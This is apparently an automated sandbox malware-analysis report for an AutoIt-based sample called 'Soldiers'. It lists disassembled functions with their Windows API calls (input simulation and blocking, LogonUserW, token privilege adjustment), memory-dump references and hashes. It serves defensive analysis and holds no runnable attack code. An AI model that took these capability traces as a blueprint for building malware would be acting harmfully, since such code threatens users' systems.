                                                          • Opcode ID: 8f82026148973048c30b3d01c2beb91eea97a833832a10e372c66f4915d6913c
                                                          • Instruction ID: a90a3d685234ba2e0807d83499fc763a74b6a238fff8a9ffe92e87523dc273ed
                                                          • Opcode Fuzzy Hash: 8f82026148973048c30b3d01c2beb91eea97a833832a10e372c66f4915d6913c
                                                          • Instruction Fuzzy Hash: 52F03776A1120CFFDB00DFE09C89EAEBBBCEB08211F0044A9A905E2180E6346A44DB50
                                                          Function 00941AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00941B01
                                                          • keybd_event.USER32(?,000BECBC,?,00000000,?,?,00000002,?,000BECBC,?,00008000), ref: 00941B14
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 547f54524ca2a52ec4da070479db4fd53f7fccbebf70d70a25f654c9eb6b5a13
                                                          • Instruction ID: 44b501b108f8117b18e91487559401df0a545c1629734d4493526153ffe59758
                                                          • Opcode Fuzzy Hash: 547f54524ca2a52ec4da070479db4fd53f7fccbebf70d70a25f654c9eb6b5a13
                                                          • Instruction Fuzzy Hash: 62F0497290424DEBDB04CF95C805BFE7BB8FF04315F00804AF9599A292D3799655EF94
                                                          Function 0094A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00959B52,?,?,?), ref: 0094A6DA
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00959B52,?,?,?), ref: 0094A6EC
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 168565edf3d946c0208f173671cf6dc163038b876152886c88ab774be70f4024
                                                          • Instruction ID: 34e3096b876f95e951960556d98bf2bd8dac3027a74f47971c9b999e6ec94d46
                                                          • Opcode Fuzzy Hash: 168565edf3d946c0208f173671cf6dc163038b876152886c88ab774be70f4024
                                                          • Instruction Fuzzy Hash: 43F0823655822EFBDB20AFA4CC49FEA776CFF09361F008155B91CD6181D6709980CBA1
                                                          Function 00938DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00938F27), ref: 00938DFE
                                                          • CloseHandle.KERNEL32(?,?,00938F27), ref: 00938E10
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 127907a7446031f0732dfc20f3588d8a9f580795079e400e9cd922e4f04ae079
                                                          • Instruction ID: 64319b10b23fbf48f5645bc650989f51d724db66cd8c0f37f55ed6a6858b11ba
                                                          • Opcode Fuzzy Hash: 127907a7446031f0732dfc20f3588d8a9f580795079e400e9cd922e4f04ae079
                                                          • Instruction Fuzzy Hash: 71E0BF76014610EFE7252B61EC09E7777ADEB44310B14891DF499C04B0DB615CD0DB50
                                                          Function 0090A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00908F87,?,?,?,00000001), ref: 0090A38A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0090A393
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 5afc36c2d3d07586da0aec5672ef234b647b96afa2af14c0a9457687cca7e11c
                                                          • Instruction ID: d6080f1b1804fff6de87c9bcbd0b3c7c8f798963fb604a367bd15a1a5f79e01d
                                                          • Opcode Fuzzy Hash: 5afc36c2d3d07586da0aec5672ef234b647b96afa2af14c0a9457687cca7e11c
                                                          • Instruction Fuzzy Hash: 3CB09232078208EBCA402B91EC09B8C3F68EB84A6AF004010F60D44060CB625490AA91
                                                          Function 009545D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 009545F0
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 9393a45c7de309011682bca3502bc321fb2a614d7fdbe58b6805ac3242b1900b
                                                          • Instruction ID: 8bab1dc601de7993f9e7f8e256b35df3d79b2c0476242f33148b0603dbfdace2
                                                          • Opcode Fuzzy Hash: 9393a45c7de309011682bca3502bc321fb2a614d7fdbe58b6805ac3242b1900b
                                                          • Instruction Fuzzy Hash: 9DE0DF36210209AFC700EF5AE800A8AF7ECFF94760F008426FC09C7311EA70E8818B91
                                                          Function 009451E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000,00955529), ref: 00945205
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: c93c18d6f9e9b32df2c0cfa8e846fd60cec9b2074225118aa51a80cd691fc925
                                                          • Instruction ID: 7e9d3153400c2a93908c19d1d5b212da32bcfce18f3d930af20499f93f3c6f0c
                                                          • Opcode Fuzzy Hash: c93c18d6f9e9b32df2c0cfa8e846fd60cec9b2074225118aa51a80cd691fc925
                                                          • Instruction Fuzzy Hash: 5FD092A717CE0A7BED5807A49E1FF7A160CE3497C1F964A49B146990C3ECD8F885A431
                                                          Function 00939369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00938FA7), ref: 00939389
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: d2a2813750148b0f8de96b1c29cf9bcf59df850962b730fd73ee1886a2be1e35
                                                          • Instruction ID: 6399b758a7666a0bbd9ddf45eb0284773e0bfa1bb979063cab5fcd477c0a2046
                                                          • Opcode Fuzzy Hash: d2a2813750148b0f8de96b1c29cf9bcf59df850962b730fd73ee1886a2be1e35
                                                          • Instruction Fuzzy Hash: CCD05E3326450EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C775D835EB60
                                                          Function 00920722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00920734
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 24df558c5db101d00a5d3be34d9fb6a31c8b24c6fc1d61fb7de9a278d6ae4dc8
                                                          • Instruction ID: 8e1058b785eb75f6dba988ce37761d065bbe90039ce5fbfd5d884f67187b7f41
                                                          • Opcode Fuzzy Hash: 24df558c5db101d00a5d3be34d9fb6a31c8b24c6fc1d61fb7de9a278d6ae4dc8
                                                          • Instruction Fuzzy Hash: 9BC04CF281411DDBDB05DBA0D988EEE77BCAB44314F100455A105B2100D7789B44DA71
                                                          Function 0090A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0090A35A
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: b108474aab1d18414aa2b1534ba9a5f9df738d09940600ed65d0ea2790c7401d
                                                          • Instruction ID: c5ce6531ce0a5d923b3d5897a452f330f2b57fa19cb7e65d00a538047b102a09
                                                          • Opcode Fuzzy Hash: b108474aab1d18414aa2b1534ba9a5f9df738d09940600ed65d0ea2790c7401d
                                                          • Instruction Fuzzy Hash: E8A0043107410CF7CF011F55FC0545D7F5DD7455557404051F50D45531D77355515DD5
                                                          Function 00957EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filememorywindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32(?), ref: 00957F45
                                                          • DeleteObject.GDI32(?), ref: 00957F57
                                                          • DestroyWindow.USER32 ref: 00957F65
                                                          • GetDesktopWindow.USER32(?), ref: 00957F7F
                                                          • GetWindowRect.USER32(00000000), ref: 00957F86
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009580C7
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009580D7
                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095811F
                                                          • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095812B
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000,?,88C00000,000000FF,000000FF,?), ref: 00958165
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958187
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0095819A
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009581A5
                                                          • GlobalLock.KERNEL32(00000000), ref: 009581AE
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009581BD
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 009581C6
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009581CD
                                                          • GlobalFree.KERNEL32(00000000), ref: 009581D8
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009581EA
                                                          • #418.OLEAUT32(88C00000,00000000,00000000,00973C7C,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958200
                                                          • GlobalFree.KERNEL32(00000000), ref: 00958210
                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958236
                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958255
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958277
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00958464
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$#418AdjustAllocClientCloseCopyDesktopDestroyHandleImageLockMessageReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2158968032-2373415609
                                                          • Opcode ID: aeb2944be21ad05aa4e1a2dd52c857c4bd8063e53e91690b7fcd737793d1df2b
                                                          • Instruction ID: 4ae6afe03f2ef52974af698157ed89c829304748babe302a9c00e5b3a5173ca2
                                                          • Opcode Fuzzy Hash: aeb2944be21ad05aa4e1a2dd52c857c4bd8063e53e91690b7fcd737793d1df2b
                                                          • Instruction Fuzzy Hash: F7027E72910105EFDB14DFA5DC89EAEBBB9FF89311F008158F919AB2A1CB309D45DB60
                                                          Function 00963BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,00970980), ref: 00963C65
                                                          • IsWindowVisible.USER32(?), ref: 00963C89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: 0dd633d7c416fa5878264cf19044c70e94ad937d644faf7ec1fe0354e1c6534e
                                                          • Instruction ID: 68e3b26e23e9d57dd8ac05b68a73c12e8c525fdc15ced9730dbd936806770e07
                                                          • Opcode Fuzzy Hash: 0dd633d7c416fa5878264cf19044c70e94ad937d644faf7ec1fe0354e1c6534e
                                                          • Instruction Fuzzy Hash: 9BD16130208315DFCB14EF54C851BAA77A9EFD5354F108858F89A5B2E2CB35ED4ACB92
                                                          Function 0096ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 0096AC55
                                                          • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?,?), ref: 0096AC86
                                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?,?), ref: 0096AC92
                                                          • SetBkColor.GDI32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?), ref: 0096ACAC
                                                          • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?), ref: 0096ACBB
                                                          • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B), ref: 0096ACE6
                                                          • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?,?), ref: 0096ACEE
                                                          • CreateSolidBrush.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?,?), ref: 0096ACF5
                                                          • FrameRect.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B), ref: 0096AD04
                                                          • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B,?,?), ref: 0096AD0B
                                                          • InflateRect.USER32(?,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?,?,0091BC7B), ref: 0096AD56
                                                          • FillRect.USER32(?,?,?), ref: 0096AD88
                                                          • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0096ADB3
                                                            • Part of subcall function 0096AF18: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?), ref: 0096AF51
                                                            • Part of subcall function 0096AF18: SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000), ref: 0096AF55
                                                            • Part of subcall function 0096AF18: GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF6B
                                                            • Part of subcall function 0096AF18: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF76
                                                            • Part of subcall function 0096AF18: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AF93
                                                            • Part of subcall function 0096AF18: CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFA1
                                                            • Part of subcall function 0096AF18: SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFB2
                                                            • Part of subcall function 0096AF18: SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFBB
                                                            • Part of subcall function 0096AF18: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFC8
                                                            • Part of subcall function 0096AF18: InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096AFE7
                                                            • Part of subcall function 0096AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0096AC1F,?), ref: 0096AFFE
                                                            • Part of subcall function 0096AF18: GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0096AC1F,?,?,00000000,?,?), ref: 0096B013
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: 663d0ac3e7e59fe85d03009b45e3d3c4d050ca8e739cce2efbf969e55c6a86b6
                                                          • Instruction ID: 7675c6de6c5bcda73396433bdc7537b51c5b4e51743d40afd7129801b4462d35
                                                          • Opcode Fuzzy Hash: 663d0ac3e7e59fe85d03009b45e3d3c4d050ca8e739cce2efbf969e55c6a86b6
                                                          • Instruction Fuzzy Hash: CCA19A7211C301EFD7119F64DC08A6BBBA9FF89321F100A19F9AAA61E0C735D984DF52
                                                          Function 008E2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 008E3072
                                                          • DeleteObject.GDI32(00000000,?,?,?), ref: 008E30B8
                                                          • DeleteObject.GDI32(00000000,?,?,?), ref: 008E30C3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 008E30CE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 008E30D9
                                                          • SendMessageW.USER32(?,00001308,?,00000000,?,?), ref: 0091C77C
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0091C7B5
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0091CBDE
                                                            • Part of subcall function 008E1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008E2412,?,00000000,?,?,?,?,008E1AA7,00000000,?), ref: 008E1F76
                                                          • SendMessageW.USER32(?,00001053), ref: 0091CC1B
